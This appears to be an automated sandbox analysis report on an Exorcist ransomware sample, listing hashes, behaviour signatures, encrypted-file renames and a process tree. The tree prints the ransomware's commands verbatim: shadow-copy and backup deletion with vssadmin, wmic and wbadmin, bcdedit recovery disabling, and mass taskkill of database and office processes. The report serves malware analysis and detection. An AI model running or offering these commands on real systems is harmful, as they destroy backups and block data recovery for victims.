Analysis
max time kernel: 112s
max time network: 82s
platform: windows7_x64
resource: win7
submitted: 24-07-2020 12:52

Static task: static1
Behavioral task: behavioral1
Sample: 79385ed97732aee0036e67824de18e28.exe
Resource: win7
Behavioral task: behavioral2
Sample: 79385ed97732aee0036e67824de18e28.exe
Resource: win10

General
Target: 79385ed97732aee0036e67824de18e28.exe
Size: 43KB
MD5: 79385ed97732aee0036e67824de18e28
SHA1: 2f65a2b8ac21b3505855f7b89551cc1f31bf636e
SHA256: 8d684a790a5683b8decde9fb5a819c4a164d3032723a151a30ff26d3c2b1aabf
SHA512: db1d99884ab384ed571195e7c85105fe1f5bef2cb7e81f1f9380a8aef99f71e9d51a46e5ea6d81acee72aa2c2eb1b371cd11097678cbd27cfa0ef9b254630072
Malware Config

Signatures
Kills process with taskkill 87 IoCs
Delays execution with timeout.exe 1 IoCs
pid: 672, Process: timeout.exe
Suspicious use of WriteProcessMemory 740 IoCs
memory of 1552 1456 79385ed97732aee0036e67824de18e28.exe 215 PID 1456 wrote to memory of 1552 1456 79385ed97732aee0036e67824de18e28.exe 215 PID 1552 wrote to memory of 1580 1552 cmd.exe 217 PID 1552 wrote to memory of 1580 1552 cmd.exe 217 PID 1552 wrote to memory of 1580 1552 cmd.exe 217 PID 1552 wrote to memory of 1580 1552 cmd.exe 217 PID 1456 wrote to memory of 1936 1456 79385ed97732aee0036e67824de18e28.exe 218 PID 1456 wrote to memory of 1936 1456 79385ed97732aee0036e67824de18e28.exe 218 PID 1456 wrote to memory of 1936 1456 79385ed97732aee0036e67824de18e28.exe 218 PID 1456 wrote to memory of 1936 1456 79385ed97732aee0036e67824de18e28.exe 218 PID 1936 wrote to memory of 2040 1936 cmd.exe 220 PID 1936 wrote to memory of 2040 1936 cmd.exe 220 PID 1936 wrote to memory of 2040 1936 cmd.exe 220 PID 1936 wrote to memory of 2040 1936 cmd.exe 220 PID 1456 wrote to memory of 1992 1456 79385ed97732aee0036e67824de18e28.exe 221 PID 1456 wrote to memory of 1992 1456 79385ed97732aee0036e67824de18e28.exe 221 PID 1456 wrote to memory of 1992 1456 79385ed97732aee0036e67824de18e28.exe 221 PID 1456 wrote to memory of 1992 1456 79385ed97732aee0036e67824de18e28.exe 221 PID 1992 wrote to memory of 512 1992 cmd.exe 223 PID 1992 wrote to memory of 512 1992 cmd.exe 223 PID 1992 wrote to memory of 512 1992 cmd.exe 223 PID 1992 wrote to memory of 512 1992 cmd.exe 223 PID 1456 wrote to memory of 1896 1456 79385ed97732aee0036e67824de18e28.exe 224 PID 1456 wrote to memory of 1896 1456 79385ed97732aee0036e67824de18e28.exe 224 PID 1456 wrote to memory of 1896 1456 79385ed97732aee0036e67824de18e28.exe 224 PID 1456 wrote to memory of 1896 1456 79385ed97732aee0036e67824de18e28.exe 224 PID 1896 wrote to memory of 1404 1896 cmd.exe 226 PID 1896 wrote to memory of 1404 1896 cmd.exe 226 PID 1896 wrote to memory of 1404 1896 cmd.exe 226 PID 1896 wrote to memory of 1404 1896 cmd.exe 226 PID 1456 wrote to memory of 1488 1456 79385ed97732aee0036e67824de18e28.exe 227 PID 1456 wrote to memory of 1488 
1456 79385ed97732aee0036e67824de18e28.exe 227 PID 1456 wrote to memory of 1488 1456 79385ed97732aee0036e67824de18e28.exe 227 PID 1456 wrote to memory of 1488 1456 79385ed97732aee0036e67824de18e28.exe 227 PID 1488 wrote to memory of 1988 1488 cmd.exe 229 PID 1488 wrote to memory of 1988 1488 cmd.exe 229 PID 1488 wrote to memory of 1988 1488 cmd.exe 229 PID 1488 wrote to memory of 1988 1488 cmd.exe 229 PID 1456 wrote to memory of 520 1456 79385ed97732aee0036e67824de18e28.exe 230 PID 1456 wrote to memory of 520 1456 79385ed97732aee0036e67824de18e28.exe 230 PID 1456 wrote to memory of 520 1456 79385ed97732aee0036e67824de18e28.exe 230 PID 1456 wrote to memory of 520 1456 79385ed97732aee0036e67824de18e28.exe 230 PID 520 wrote to memory of 380 520 cmd.exe 232 PID 520 wrote to memory of 380 520 cmd.exe 232 PID 520 wrote to memory of 380 520 cmd.exe 232 PID 520 wrote to memory of 380 520 cmd.exe 232 PID 1456 wrote to memory of 1280 1456 79385ed97732aee0036e67824de18e28.exe 233 PID 1456 wrote to memory of 1280 1456 79385ed97732aee0036e67824de18e28.exe 233 PID 1456 wrote to memory of 1280 1456 79385ed97732aee0036e67824de18e28.exe 233 PID 1456 wrote to memory of 1280 1456 79385ed97732aee0036e67824de18e28.exe 233 PID 1280 wrote to memory of 804 1280 cmd.exe 235 PID 1280 wrote to memory of 804 1280 cmd.exe 235 PID 1280 wrote to memory of 804 1280 cmd.exe 235 PID 1280 wrote to memory of 804 1280 cmd.exe 235 PID 1456 wrote to memory of 1644 1456 79385ed97732aee0036e67824de18e28.exe 236 PID 1456 wrote to memory of 1644 1456 79385ed97732aee0036e67824de18e28.exe 236 PID 1456 wrote to memory of 1644 1456 79385ed97732aee0036e67824de18e28.exe 236 PID 1456 wrote to memory of 1644 1456 79385ed97732aee0036e67824de18e28.exe 236 PID 1644 wrote to memory of 1760 1644 cmd.exe 238 PID 1644 wrote to memory of 1760 1644 cmd.exe 238 PID 1644 wrote to memory of 1760 1644 cmd.exe 238 PID 1644 wrote to memory of 1760 1644 cmd.exe 238 PID 1456 wrote to memory of 1848 1456 
79385ed97732aee0036e67824de18e28.exe 239 PID 1456 wrote to memory of 1848 1456 79385ed97732aee0036e67824de18e28.exe 239 PID 1456 wrote to memory of 1848 1456 79385ed97732aee0036e67824de18e28.exe 239 PID 1456 wrote to memory of 1848 1456 79385ed97732aee0036e67824de18e28.exe 239 PID 1848 wrote to memory of 1528 1848 cmd.exe 241 PID 1848 wrote to memory of 1528 1848 cmd.exe 241 PID 1848 wrote to memory of 1528 1848 cmd.exe 241 PID 1848 wrote to memory of 1528 1848 cmd.exe 241 PID 1456 wrote to memory of 1572 1456 79385ed97732aee0036e67824de18e28.exe 242 PID 1456 wrote to memory of 1572 1456 79385ed97732aee0036e67824de18e28.exe 242 PID 1456 wrote to memory of 1572 1456 79385ed97732aee0036e67824de18e28.exe 242 PID 1456 wrote to memory of 1572 1456 79385ed97732aee0036e67824de18e28.exe 242 PID 1572 wrote to memory of 1932 1572 cmd.exe 244 PID 1572 wrote to memory of 1932 1572 cmd.exe 244 PID 1572 wrote to memory of 1932 1572 cmd.exe 244 PID 1572 wrote to memory of 1932 1572 cmd.exe 244 PID 1456 wrote to memory of 1912 1456 79385ed97732aee0036e67824de18e28.exe 245 PID 1456 wrote to memory of 1912 1456 79385ed97732aee0036e67824de18e28.exe 245 PID 1456 wrote to memory of 1912 1456 79385ed97732aee0036e67824de18e28.exe 245 PID 1456 wrote to memory of 1912 1456 79385ed97732aee0036e67824de18e28.exe 245 PID 1912 wrote to memory of 1916 1912 cmd.exe 247 PID 1912 wrote to memory of 1916 1912 cmd.exe 247 PID 1912 wrote to memory of 1916 1912 cmd.exe 247 PID 1912 wrote to memory of 1916 1912 cmd.exe 247 PID 1456 wrote to memory of 1612 1456 79385ed97732aee0036e67824de18e28.exe 248 PID 1456 wrote to memory of 1612 1456 79385ed97732aee0036e67824de18e28.exe 248 PID 1456 wrote to memory of 1612 1456 79385ed97732aee0036e67824de18e28.exe 248 PID 1456 wrote to memory of 1612 1456 79385ed97732aee0036e67824de18e28.exe 248 PID 1612 wrote to memory of 980 1612 cmd.exe 250 PID 1612 wrote to memory of 980 1612 cmd.exe 250 PID 1612 wrote to memory of 980 1612 cmd.exe 250 PID 1612 wrote to memory 
of 980 1612 cmd.exe 250 PID 1456 wrote to memory of 1060 1456 79385ed97732aee0036e67824de18e28.exe 251 PID 1456 wrote to memory of 1060 1456 79385ed97732aee0036e67824de18e28.exe 251 PID 1456 wrote to memory of 1060 1456 79385ed97732aee0036e67824de18e28.exe 251 PID 1456 wrote to memory of 1060 1456 79385ed97732aee0036e67824de18e28.exe 251 PID 1060 wrote to memory of 2024 1060 cmd.exe 253 PID 1060 wrote to memory of 2024 1060 cmd.exe 253 PID 1060 wrote to memory of 2024 1060 cmd.exe 253 PID 1060 wrote to memory of 2024 1060 cmd.exe 253 PID 1456 wrote to memory of 820 1456 79385ed97732aee0036e67824de18e28.exe 254 PID 1456 wrote to memory of 820 1456 79385ed97732aee0036e67824de18e28.exe 254 PID 1456 wrote to memory of 820 1456 79385ed97732aee0036e67824de18e28.exe 254 PID 1456 wrote to memory of 820 1456 79385ed97732aee0036e67824de18e28.exe 254 PID 820 wrote to memory of 272 820 cmd.exe 256 PID 820 wrote to memory of 272 820 cmd.exe 256 PID 820 wrote to memory of 272 820 cmd.exe 256 PID 820 wrote to memory of 272 820 cmd.exe 256 PID 1456 wrote to memory of 832 1456 79385ed97732aee0036e67824de18e28.exe 257 PID 1456 wrote to memory of 832 1456 79385ed97732aee0036e67824de18e28.exe 257 PID 1456 wrote to memory of 832 1456 79385ed97732aee0036e67824de18e28.exe 257 PID 1456 wrote to memory of 832 1456 79385ed97732aee0036e67824de18e28.exe 257 PID 832 wrote to memory of 608 832 cmd.exe 259 PID 832 wrote to memory of 608 832 cmd.exe 259 PID 832 wrote to memory of 608 832 cmd.exe 259 PID 832 wrote to memory of 608 832 cmd.exe 259 PID 1456 wrote to memory of 1820 1456 79385ed97732aee0036e67824de18e28.exe 260 PID 1456 wrote to memory of 1820 1456 79385ed97732aee0036e67824de18e28.exe 260 PID 1456 wrote to memory of 1820 1456 79385ed97732aee0036e67824de18e28.exe 260 PID 1456 wrote to memory of 1820 1456 79385ed97732aee0036e67824de18e28.exe 260 PID 1820 wrote to memory of 912 1820 cmd.exe 262 PID 1820 wrote to memory of 912 1820 cmd.exe 262 PID 1820 wrote to memory of 912 1820 cmd.exe 
262 PID 1820 wrote to memory of 912 1820 cmd.exe 262 PID 1456 wrote to memory of 1812 1456 79385ed97732aee0036e67824de18e28.exe 263 PID 1456 wrote to memory of 1812 1456 79385ed97732aee0036e67824de18e28.exe 263 PID 1456 wrote to memory of 1812 1456 79385ed97732aee0036e67824de18e28.exe 263 PID 1456 wrote to memory of 1812 1456 79385ed97732aee0036e67824de18e28.exe 263 PID 1812 wrote to memory of 1608 1812 cmd.exe 265 PID 1812 wrote to memory of 1608 1812 cmd.exe 265 PID 1812 wrote to memory of 1608 1812 cmd.exe 265 PID 1812 wrote to memory of 1608 1812 cmd.exe 265 PID 1456 wrote to memory of 1276 1456 79385ed97732aee0036e67824de18e28.exe 266 PID 1456 wrote to memory of 1276 1456 79385ed97732aee0036e67824de18e28.exe 266 PID 1456 wrote to memory of 1276 1456 79385ed97732aee0036e67824de18e28.exe 266 PID 1456 wrote to memory of 1276 1456 79385ed97732aee0036e67824de18e28.exe 266 PID 1276 wrote to memory of 1236 1276 cmd.exe 268 PID 1276 wrote to memory of 1236 1276 cmd.exe 268 PID 1276 wrote to memory of 1236 1276 cmd.exe 268 PID 1276 wrote to memory of 1236 1276 cmd.exe 268 PID 1456 wrote to memory of 1732 1456 79385ed97732aee0036e67824de18e28.exe 269 PID 1456 wrote to memory of 1732 1456 79385ed97732aee0036e67824de18e28.exe 269 PID 1456 wrote to memory of 1732 1456 79385ed97732aee0036e67824de18e28.exe 269 PID 1456 wrote to memory of 1732 1456 79385ed97732aee0036e67824de18e28.exe 269 PID 1732 wrote to memory of 1800 1732 cmd.exe 271 PID 1732 wrote to memory of 1800 1732 cmd.exe 271 PID 1732 wrote to memory of 1800 1732 cmd.exe 271 PID 1732 wrote to memory of 1800 1732 cmd.exe 271 PID 1456 wrote to memory of 1880 1456 79385ed97732aee0036e67824de18e28.exe 272 PID 1456 wrote to memory of 1880 1456 79385ed97732aee0036e67824de18e28.exe 272 PID 1456 wrote to memory of 1880 1456 79385ed97732aee0036e67824de18e28.exe 272 PID 1456 wrote to memory of 1880 1456 79385ed97732aee0036e67824de18e28.exe 272 PID 1880 wrote to memory of 1532 1880 cmd.exe 274 PID 1880 wrote to memory of 1532 
1880 cmd.exe 274 PID 1880 wrote to memory of 1532 1880 cmd.exe 274 PID 1880 wrote to memory of 1532 1880 cmd.exe 274 PID 1456 wrote to memory of 268 1456 79385ed97732aee0036e67824de18e28.exe 275 PID 1456 wrote to memory of 268 1456 79385ed97732aee0036e67824de18e28.exe 275 PID 1456 wrote to memory of 268 1456 79385ed97732aee0036e67824de18e28.exe 275 PID 1456 wrote to memory of 268 1456 79385ed97732aee0036e67824de18e28.exe 275 PID 268 wrote to memory of 468 268 cmd.exe 277 PID 268 wrote to memory of 468 268 cmd.exe 277 PID 268 wrote to memory of 468 268 cmd.exe 277 PID 268 wrote to memory of 468 268 cmd.exe 277 PID 1456 wrote to memory of 1856 1456 79385ed97732aee0036e67824de18e28.exe 278 PID 1456 wrote to memory of 1856 1456 79385ed97732aee0036e67824de18e28.exe 278 PID 1456 wrote to memory of 1856 1456 79385ed97732aee0036e67824de18e28.exe 278 PID 1456 wrote to memory of 1856 1456 79385ed97732aee0036e67824de18e28.exe 278 PID 1856 wrote to memory of 2008 1856 cmd.exe 280 PID 1856 wrote to memory of 2008 1856 cmd.exe 280 PID 1856 wrote to memory of 2008 1856 cmd.exe 280 PID 1856 wrote to memory of 2008 1856 cmd.exe 280 PID 1456 wrote to memory of 512 1456 79385ed97732aee0036e67824de18e28.exe 281 PID 1456 wrote to memory of 512 1456 79385ed97732aee0036e67824de18e28.exe 281 PID 1456 wrote to memory of 512 1456 79385ed97732aee0036e67824de18e28.exe 281 PID 1456 wrote to memory of 512 1456 79385ed97732aee0036e67824de18e28.exe 281 PID 512 wrote to memory of 1496 512 cmd.exe 283 PID 512 wrote to memory of 1496 512 cmd.exe 283 PID 512 wrote to memory of 1496 512 cmd.exe 283 PID 512 wrote to memory of 1496 512 cmd.exe 283 PID 1456 wrote to memory of 1404 1456 79385ed97732aee0036e67824de18e28.exe 284 PID 1456 wrote to memory of 1404 1456 79385ed97732aee0036e67824de18e28.exe 284 PID 1456 wrote to memory of 1404 1456 79385ed97732aee0036e67824de18e28.exe 284 PID 1456 wrote to memory of 1404 1456 79385ed97732aee0036e67824de18e28.exe 284 PID 1404 wrote to memory of 2032 1404 cmd.exe 
286 PID 1404 wrote to memory of 2032 1404 cmd.exe 286 PID 1404 wrote to memory of 2032 1404 cmd.exe 286 PID 1404 wrote to memory of 2032 1404 cmd.exe 286 PID 1456 wrote to memory of 1988 1456 79385ed97732aee0036e67824de18e28.exe 287 PID 1456 wrote to memory of 1988 1456 79385ed97732aee0036e67824de18e28.exe 287 PID 1456 wrote to memory of 1988 1456 79385ed97732aee0036e67824de18e28.exe 287 PID 1456 wrote to memory of 1988 1456 79385ed97732aee0036e67824de18e28.exe 287 PID 1988 wrote to memory of 1340 1988 cmd.exe 289 PID 1988 wrote to memory of 1340 1988 cmd.exe 289 PID 1988 wrote to memory of 1340 1988 cmd.exe 289 PID 1988 wrote to memory of 1340 1988 cmd.exe 289 PID 1456 wrote to memory of 380 1456 79385ed97732aee0036e67824de18e28.exe 290 PID 1456 wrote to memory of 380 1456 79385ed97732aee0036e67824de18e28.exe 290 PID 1456 wrote to memory of 380 1456 79385ed97732aee0036e67824de18e28.exe 290 PID 1456 wrote to memory of 380 1456 79385ed97732aee0036e67824de18e28.exe 290 PID 380 wrote to memory of 1400 380 cmd.exe 292 PID 380 wrote to memory of 1400 380 cmd.exe 292 PID 380 wrote to memory of 1400 380 cmd.exe 292 PID 380 wrote to memory of 1400 380 cmd.exe 292 PID 1456 wrote to memory of 804 1456 79385ed97732aee0036e67824de18e28.exe 293 PID 1456 wrote to memory of 804 1456 79385ed97732aee0036e67824de18e28.exe 293 PID 1456 wrote to memory of 804 1456 79385ed97732aee0036e67824de18e28.exe 293 PID 1456 wrote to memory of 804 1456 79385ed97732aee0036e67824de18e28.exe 293 PID 804 wrote to memory of 1804 804 cmd.exe 295 PID 804 wrote to memory of 1804 804 cmd.exe 295 PID 804 wrote to memory of 1804 804 cmd.exe 295 PID 804 wrote to memory of 1804 804 cmd.exe 295 PID 1456 wrote to memory of 1760 1456 79385ed97732aee0036e67824de18e28.exe 296 PID 1456 wrote to memory of 1760 1456 79385ed97732aee0036e67824de18e28.exe 296 PID 1456 wrote to memory of 1760 1456 79385ed97732aee0036e67824de18e28.exe 296 PID 1456 wrote to memory of 1760 1456 79385ed97732aee0036e67824de18e28.exe 296 PID 
1760 wrote to memory of 740 1760 cmd.exe 298 PID 1760 wrote to memory of 740 1760 cmd.exe 298 PID 1760 wrote to memory of 740 1760 cmd.exe 298 PID 1760 wrote to memory of 740 1760 cmd.exe 298 PID 1456 wrote to memory of 1528 1456 79385ed97732aee0036e67824de18e28.exe 299 PID 1456 wrote to memory of 1528 1456 79385ed97732aee0036e67824de18e28.exe 299 PID 1456 wrote to memory of 1528 1456 79385ed97732aee0036e67824de18e28.exe 299 PID 1456 wrote to memory of 1528 1456 79385ed97732aee0036e67824de18e28.exe 299 PID 1528 wrote to memory of 1356 1528 cmd.exe 301 PID 1528 wrote to memory of 1356 1528 cmd.exe 301 PID 1528 wrote to memory of 1356 1528 cmd.exe 301 PID 1528 wrote to memory of 1356 1528 cmd.exe 301 PID 1456 wrote to memory of 1932 1456 79385ed97732aee0036e67824de18e28.exe 302 PID 1456 wrote to memory of 1932 1456 79385ed97732aee0036e67824de18e28.exe 302 PID 1456 wrote to memory of 1932 1456 79385ed97732aee0036e67824de18e28.exe 302 PID 1456 wrote to memory of 1932 1456 79385ed97732aee0036e67824de18e28.exe 302 PID 1932 wrote to memory of 1556 1932 cmd.exe 304 PID 1932 wrote to memory of 1556 1932 cmd.exe 304 PID 1932 wrote to memory of 1556 1932 cmd.exe 304 PID 1932 wrote to memory of 1556 1932 cmd.exe 304 PID 1456 wrote to memory of 656 1456 79385ed97732aee0036e67824de18e28.exe 310 PID 1456 wrote to memory of 656 1456 79385ed97732aee0036e67824de18e28.exe 310 PID 1456 wrote to memory of 656 1456 79385ed97732aee0036e67824de18e28.exe 310 PID 1456 wrote to memory of 656 1456 79385ed97732aee0036e67824de18e28.exe 310 PID 656 wrote to memory of 672 656 cmd.exe 312 PID 656 wrote to memory of 672 656 cmd.exe 312 PID 656 wrote to memory of 672 656 cmd.exe 312 PID 656 wrote to memory of 672 656 cmd.exe 312 -
Enumerates connected drives 3 TTPs
-
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process
Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\d.bmp" 79385ed97732aee0036e67824de18e28.exe
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies service 2 TTPs 4 IoCs
description ioc Process
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe
-
Modifies extensions of user files 19 IoCs
Ransomware generally changes the extension on encrypted files.
description ioc Process
File opened for modification C:\Users\Admin\Pictures\InvokeMeasure.tif.BivfQc 79385ed97732aee0036e67824de18e28.exe
File opened for modification C:\Users\Admin\Pictures\RestartReset.crw.BivfQc 79385ed97732aee0036e67824de18e28.exe
File opened for modification C:\Users\Admin\Pictures\AssertDisable.tif.BivfQc 79385ed97732aee0036e67824de18e28.exe
File opened for modification C:\Users\Admin\Pictures\DenyJoin.tif.BivfQc 79385ed97732aee0036e67824de18e28.exe
File opened for modification C:\Users\Admin\Pictures\DismountEdit.tiff 79385ed97732aee0036e67824de18e28.exe
File renamed C:\Users\Admin\Pictures\DismountEdit.tiff => C:\Users\Admin\Pictures\DismountEdit.tiff.BivfQc 79385ed97732aee0036e67824de18e28.exe
File renamed C:\Users\Admin\Pictures\InstallNew.crw => C:\Users\Admin\Pictures\InstallNew.crw.BivfQc 79385ed97732aee0036e67824de18e28.exe
File opened for modification C:\Users\Admin\Pictures\InstallNew.crw.BivfQc 79385ed97732aee0036e67824de18e28.exe
File renamed C:\Users\Admin\Pictures\PushDeny.crw => C:\Users\Admin\Pictures\PushDeny.crw.BivfQc 79385ed97732aee0036e67824de18e28.exe
File renamed C:\Users\Admin\Pictures\DenyJoin.tif => C:\Users\Admin\Pictures\DenyJoin.tif.BivfQc 79385ed97732aee0036e67824de18e28.exe
File renamed C:\Users\Admin\Pictures\DisconnectEdit.raw => C:\Users\Admin\Pictures\DisconnectEdit.raw.BivfQc 79385ed97732aee0036e67824de18e28.exe
File opened for modification C:\Users\Admin\Pictures\DismountEdit.tiff.BivfQc 79385ed97732aee0036e67824de18e28.exe
File renamed C:\Users\Admin\Pictures\OutComplete.tif => C:\Users\Admin\Pictures\OutComplete.tif.BivfQc 79385ed97732aee0036e67824de18e28.exe
File renamed C:\Users\Admin\Pictures\AssertDisable.tif => C:\Users\Admin\Pictures\AssertDisable.tif.BivfQc 79385ed97732aee0036e67824de18e28.exe
File opened for modification C:\Users\Admin\Pictures\DisconnectEdit.raw.BivfQc 79385ed97732aee0036e67824de18e28.exe
File renamed C:\Users\Admin\Pictures\InvokeMeasure.tif => C:\Users\Admin\Pictures\InvokeMeasure.tif.BivfQc 79385ed97732aee0036e67824de18e28.exe
File opened for modification C:\Users\Admin\Pictures\OutComplete.tif.BivfQc 79385ed97732aee0036e67824de18e28.exe
File opened for modification C:\Users\Admin\Pictures\PushDeny.crw.BivfQc 79385ed97732aee0036e67824de18e28.exe
File renamed C:\Users\Admin\Pictures\RestartReset.crw => C:\Users\Admin\Pictures\RestartReset.crw.BivfQc 79385ed97732aee0036e67824de18e28.exe
-
Suspicious behavior: EnumeratesProcesses 398 IoCs
79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe -
NTFS ADS 5 IoCs
description ioc Process
- File created C:\Users\Admin\AppData\Local\Temp\boot.sys:adbpjrmig 79385ed97732aee0036e67824de18e28.exe
- File created C:\Users\Admin\AppData\Local\Temp\boot.sys:lxqgwsimxzeqhnwaq 79385ed97732aee0036e67824de18e28.exe
- File opened for modification C:\Users\Admin\AppData\Local\Temp\boot.sys:wrtonhzylpznh 79385ed97732aee0036e67824de18e28.exe
- File opened for modification C:\Users\Admin\AppData\Local\Temp\boot.sys:adbpjrmig 79385ed97732aee0036e67824de18e28.exe
- File created C:\Users\Admin\AppData\Local\Temp\boot.sys:lajwebwylzuwgkqu 79385ed97732aee0036e67824de18e28.exe
-
Deletes itself 1 IoCs
pid Process
- 656 cmd.exe
-
Exorcist
Ransomware-as-a-service which avoids infecting machines in CIS nations. First seen in mid-2020.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process
- 1556 vssadmin.exe
-
Suspicious use of AdjustPrivilegeToken 127 IoCs
Processes
-
Process tree (indentation shows parent/child; each line gives PID, image path and command line; behaviour signatures are listed beneath the process that triggered them):

PID:1456  C:\Users\Admin\AppData\Local\Temp\79385ed97732aee0036e67824de18e28.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\79385ed97732aee0036e67824de18e28.exe"
  - Suspicious use of WriteProcessMemory
  - Sets desktop wallpaper using registry
  - Modifies extensions of user files
  - Suspicious behavior: EnumeratesProcesses
  - NTFS ADS
  PID:912  C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /C wmic.exe SHADOWCOPY DELETE /nointeractive
    - Suspicious use of WriteProcessMemory
    PID:292  C:\Windows\SysWOW64\Wbem\WMIC.exe  cmdline: wmic.exe SHADOWCOPY DELETE /nointeractive
      - Suspicious use of AdjustPrivilegeToken
  PID:1796  C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /C wbadmin DELETE SYSTEMSTATEBACKUP
  PID:1816  C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /C wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest
  PID:1776  C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /C bcdedit.exe /set {default} recoveryenabled No
  PID:1784  C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /C bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
  PID:1576  C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /C vssadmin.exe Delete Shadows /All /Quiet
    - Suspicious use of WriteProcessMemory
    PID:1556  C:\Windows\SysWOW64\vssadmin.exe  cmdline: vssadmin.exe Delete Shadows /All /Quiet
      - Interacts with shadow copies
  PID:1552  C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /C C:\Windows\system32\vssvc.exe
  PID:1908  C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /C taskkill /F /T /IM wxServer*
    - Suspicious use of WriteProcessMemory
    PID:1924  C:\Windows\SysWOW64\taskkill.exe  cmdline: taskkill /F /T /IM wxServer*
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken
  PID:2028  C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /C taskkill /F /T /IM wxServerView*
    - Suspicious use of WriteProcessMemory
    PID:1996  C:\Windows\SysWOW64\taskkill.exe  cmdline: taskkill /F /T /IM wxServerView*
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken
  PID:1896  C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /C taskkill /F /T /IM sqlmangr*
    - Suspicious use of WriteProcessMemory
    PID:1892  C:\Windows\SysWOW64\taskkill.exe  cmdline: taskkill /F /T /IM sqlmangr*
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken
  PID:1392  C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /C taskkill /F /T /IM RAgui*
    PID:884  C:\Windows\SysWOW64\taskkill.exe  cmdline: taskkill /F /T /IM RAgui*
      - Suspicious use of AdjustPrivilegeToken
  PID:1540  C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /C taskkill /F /T /IM supervise*
    PID:788  C:\Windows\SysWOW64\taskkill.exe  cmdline: taskkill /F /T /IM supervise*
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken
  PID:304  C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /C taskkill /F /T /IM Culture*
    PID:1604  C:\Windows\SysWOW64\taskkill.exe  cmdline: taskkill /F /T /IM Culture*
      - Suspicious use of AdjustPrivilegeToken
  PID:1360  C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /C taskkill /F /T /IM Defwatch*
    PID:1840  C:\Windows\SysWOW64\taskkill.exe  cmdline: taskkill /F /T /IM Defwatch*
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken
  PID:1768  C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /C taskkill /F /T /IM winword*
    PID:1596  C:\Windows\SysWOW64\taskkill.exe  cmdline: taskkill /F /T /IM winword*
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken
  PID:1852  C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /C taskkill /F /T /IM QBW32*
    PID:1880  C:\Windows\SysWOW64\taskkill.exe  cmdline: taskkill /F /T /IM QBW32*
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken
  PID:1980  C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /C taskkill /F /T /IM QBDBMgr*
    PID:1920  C:\Windows\SysWOW64\taskkill.exe  cmdline: taskkill /F /T /IM QBDBMgr*
      - Suspicious use of AdjustPrivilegeToken
  PID:1988  C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /C taskkill /F /T /IM qbupdate*
    PID:2032  C:\Windows\SysWOW64\taskkill.exe  cmdline: taskkill /F /T /IM qbupdate*
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken
  PID:1056  C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /C taskkill /F /T /IM axlbridge*
    PID:1884  C:\Windows\SysWOW64\taskkill.exe  cmdline: taskkill /F /T /IM axlbridge*
      - Suspicious use of AdjustPrivilegeToken
  PID:1464  C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /C taskkill /F /T /IM httpd*
    PID:820  C:\Windows\SysWOW64\taskkill.exe  cmdline: taskkill /F /T /IM httpd*
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken
  PID:740  C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /C taskkill /F /T /IM fdlauncher*
    PID:480  C:\Windows\SysWOW64\taskkill.exe  cmdline: taskkill /F /T /IM fdlauncher*
      - Suspicious use of AdjustPrivilegeToken
  PID:1800  C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /C taskkill /F /T /IM MsDtSrvr*
